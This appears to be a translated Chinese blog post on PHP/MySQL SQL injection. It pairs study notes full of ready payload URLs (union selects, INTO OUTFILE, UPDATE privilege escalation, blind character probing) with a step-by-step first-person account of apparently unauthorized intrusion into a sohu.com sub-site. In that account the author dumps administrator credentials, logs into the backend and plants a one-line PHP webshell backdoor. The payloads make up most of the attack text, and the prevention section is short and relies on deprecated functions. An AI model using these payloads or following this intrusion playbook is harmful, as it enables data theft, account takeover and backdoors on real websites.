Introduction to sql database Analysis of SQL injection process of PHP

Today I learned basic skills about SQL injection from the Internet. The focus of SQL injection is to construct SQL statements. Only by flexibly using SQL statements can we construct incredible injection strings. After studying, I wrote some notes and have them ready for use at any time. I hope you will understand the basic principles of SQL first when reading the following content. The code in the notes comes from the Internet.
===Basic part===
　This table query:
　http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
　http://127.0.0.1/ injection/user.php?username=angel' and LEFT(password,1)='m
　Union union statement:
　http://127.0.0.1/injection/show.php?id=1' union select 1,username, password from user/*
　http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
　Export file:
　http://127.0.0.1/injection/user .php?username=angel' into outfile 'c:/file.txt
　http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
　http: //127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
INSERT statement:
　INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
The constructed homepage value is: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#' , '1');
UPDATE statement: I like this thing
　Understand this SQL first
　UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE
　If this SQL is modified to the following Form, the injection is realized
　1: Modify the homepage value to
　http://4ngel.net', userlevel='3
　Then the SQL statement becomes
　UPDATE user SET password='mypass', homepage='http:// 4ngel.net', userlevel='3' WHERE
　　userlevel is the user level
　2: Modify the password value to
　mypass)' WHERE username='admin'#
　Then the SQL statement becomes
　UPDATE user SET password='MD5(mypass )' WHERE username='admin'#)', homepage='$homepage' WHERE
　3: Modify the id value to
　OR username='admin'
　Then the SQL statement becomes
　UPDATE user SET password='MD5($ password)', homepage='$homepage' WHERE OR username='admin'
===Advanced part===
Commonly used MySQL built-in functions
　DATABASE()
　USER()
　SYSTEM_USER()
　SESSION_USER()
　CURRENT_USER ()
　　database()
　version()
　SUBSTRING()
　MID()
　char()
　load_file()
　……
　　Function application
　UPDATE article SET title=DATABASE() WHERE id=1
　http:// 127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
　 SELECT * FROM user WHERE username=char(97,110,103,101,108)
　 # char(97,110,103,101,108) Equivalent to angel, decimal
　 http ://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)> ;char(100)
　http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111
　Determine the number and type of fields in the data structure
　http ://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
　　http://127.0.0.1/injection/show.php?id=-1 union select char(97), char(97),char(97)
　Guess the data table name
　http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members
　Cross-table query to get the user name and password
　http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1 from ymdown_user where id=1
　Others
　#Verify the first password
　http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
===Injection Prevention===
　In terms of server
　magic_quotes_gpc is set to On
　Display_errors is set to Off
　In terms of encoding
　$keywords = addslashes($keywords);
　$keywords = str_replace("_","_",$keywords
Inject
　if (get_magic_quotes_gpc()) {
　　 //....
　 }else{
　 $str = mysql_real_escape_string($str);
　$keywords = str_replace("_","_",$keywords);
　$ keywords = str_replace("%","%",$keywords);
　}
　Useful functions
　stripslashes()
　get_magic_quotes_gpc()
　mysql_real_escape_string()
　strip_tags()
　array_map()
　addslashes()
　Reference article:
　　http://www.4ngel.net/article/36.htm (SQL Injection with MySQL)中文
　　http://www.phpe.net/mysql_manual/06-4.html (MYSQL statement reference)
　For sohu. A security inspection on com
has been published on Hacker Defense Line
Published on http://www.loveshell.net
sohu.com is a relatively large portal in China, providing many services including email.It is difficult for such a large website to avoid problems. As the saying goes, the more services there are, the less secure it is! This is true for both servers and websites. I recently learned about Mysql injection, so I did it on sohu.com. A small security check to see if it has SQL injection vulnerabilities.
Looking at the main website of sohu.com, I found that they were almost all static, so I gave up the idea of ​​finding problems on the main website. After browsing directly on the various sub-sites of sohu.com, I found that most websites use Php scripts, and a few use jsp scripts. Based on experience, we know that for systems built with Php, the background database is generally It is Mysql, just like asp corresponds to Mssql. It seems that there are still many possible problems. Due to the characteristics of Php (Php converts characters such as ' in the passed parameters by default, so it is difficult to inject character type variables by default), generally we can only inject numeric type variables. Based on our usual injection knowledge, we know that the parameters passed in the form of id=XXX are generally numeric variables, so we only need to test those connections with php?id=XXX to find the vulnerability! After some careful search , I really found a problematic connection on XXX.it.sohu.com http://XXX.it.sohu.com/book/serialize.php?id=86
　Submit:
　http:// XXX.it.sohu.com/book/serialize.php?id=86 and 1=1/*
　 Return to normal as shown in Figure 1.
　Then submit:
　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2/*
　There is no information returned, as shown in Figure 2, it is empty, it should be the result of the SQL statement: empty.
　Through these two Urls, we can guess that the vulnerability exists, because the and 1=1 and and 1=2 we submitted are executed as Sql statements! Then other statements we submitted can also be executed, this is Sql Injected! We can also know that the id variable is treated as a number and is not placed between '', otherwise we will not succeed! If the variable does not filter other Sql keywords, we are very likely to succeed. La! I have encountered many situations where variables filter the select, which is a dead end in mysql. It’s so depressing!
Since the vulnerability exists, let’s continue! The first thing is to detect the type of database and the account connecting to the database. !If the authority is high and the database and web are on the same machine, you can avoid the pain of guessing fields! Submit:
　http://XXX.it.sohu.com/book/serialize.php?id=86 and ord(mid(version() ,1,1))>51/*
　 Return to normal as shown in Figure 3. This statement is to see if the database version is higher than 3, because the ASCII of 3 is 51! If the first character of the version is greater than 51 Of course it is 4.0 or above! 4.0 or above supports union query, which can save you the pain of guessing one by one! The result here is true, so the database is 4.0 or above and can support union.
Since union query is supported, let’s expose the fields of this statement first! It will be very fast to use union to query anything in the future! Submit:
　http://XXX.it.sohu.com/book/serialize.php ?id=86 order by 10/*
　The returned result is normal as shown in Figure 4. It seems that the fields are greater than 10. Continue to submit:
　http://XXX.it.sohu.com/book/serialize.php?id= 86 order by 20/*
　Normal return, submit:
　http://XXX.it.sohu.com/book/serialize.php?id=86 order by 30/*
　……
　To order by When 50 was returned, there was no information! It seemed that it was greater than 40 and less than 50, so I submitted:
　http://XXX.it.sohu.com/book/serialize.php?id=86 order by 45/*
　. .....
　Finally I guessed that the field is around 41! I say left and right here because some fields cannot be sorted, so we need to use union to accurately locate the field number which is 41. Submit:
　http://XXX. it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41/*
　The returned result is as shown in Figure 5, haha, it’s successful! It’s clear which fields will be displayed on the page! Now let’s continue! Submit:
　http://XXX.it.sohu.com/book/ serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 /*
　The return result is as shown in Figure 6, which completes the detection of the database system! It is very likely that we are not root, and the database server and web are very likely not on the same server. In this case, we will not have file permissions! Submit:
　http://XXX.it.sohu.com/book/serialize.php?id=86 and (select count(*) from mysql.user)>0/*
　The return result is as shown in Figure 7, there is no mysql Read permission, and I am more sure that the permission is not root! Haha!
Since it is not root, don’t be discouraged, let’s continue! Before further guessing the data, we’d better find the background first. Many times we find the administrator password but can’t. I log in somewhere, and it’s very depressing! Adding /admin and /manage/ in the root directory and other commonly used addresses in the backend all return 404 errors. After guessing several times, 403 Forbiden finally appeared when admin in the /book/ directory. Wrong, haha, this directory exists! But I can’t guess the login page, so I’m depressed! But now that I know there is an admin, I can search on Google:
　admin site:sohu.com
　As shown in Figure 8, I got In another sub-site forum, we know that people are very lazy. Usually the characteristics of the backend of a place are likely to be the characteristics of the entire website, so when I tried to access /book/admin/admuser.php, a miracle happened. As shown in Figure 9, haha, we are closer to success! Now we know the background of the website. In fact, we can also get very important information. Looking at the original file, we find that the names of the login form are name and password. It is easy to guess the other party. The structure in the administrator table is almost the same even if it does not meet the estimate, haha! So you know why we have to guess the background first! Keep injecting! Submit:
　http://XXX.it.sohu.com/book/serialize. php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin /*
　An error is returned, indicating that the admin table does not exist. Try admins and admin_user, etc., and finally submit:
　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
　 will return successfully, haha! There is a User table! So is it an administrator table? What are the fields? Continue to submit:
　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
　An error that returns empty information, submit:
　http://XXX .it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41 from user/*
　The return result is shown in Figure 10. Haha, it returns normally and a password comes out. It should be the password of the first user in the administrator table! So what is his user name? I guess many fields are An error was returned. When there was really no other way, I entered an ID and the return was successful! The ID is the name of the administrator! Submit:
　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,id,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
　The return result is as shown in Figure 11, haha, get The administrator’s name is there! Excitedly, I took the administrator’s name and password to the backend and logged in successfully! As shown in Figure 12.Now it’s time to think about how to get the webshell. I found a place to upload pictures in the background, but when I uploaded the php file, it prompted that it was not an image file. I was depressed! I carefully rummaged around in the background for a while and found that there was The function of generating PHP files, so a one-sentence PHP backdoor was inserted into it, as shown in Figure 13. After clicking Generate, the prompt was successful. It seems that if there is no filtering, we should get the webshell. The password is a. Use one-sentence backdoor to connect Go up as shown in Figure 14, haha, it was successful! The script detected that this was successfully completed!
After getting the webshell, I checked on the server and found that the security of the server was good, but the command could not be executed, and basically all directories except It is not writable outside the directory we just uploaded, but as a script test, it is considered a success if we get the webshell! It can also be seen that a small parameter without filtering can lead to the collapse of the website, especially something like sohu Large websites like .com have more parameters, so you need to pay more attention to filtering issues!

The above introduces the SQL injection process analysis of getting started with sql database, including the content of getting started with sql database. I hope it will be helpful to friends who are interested in PHP tutorials.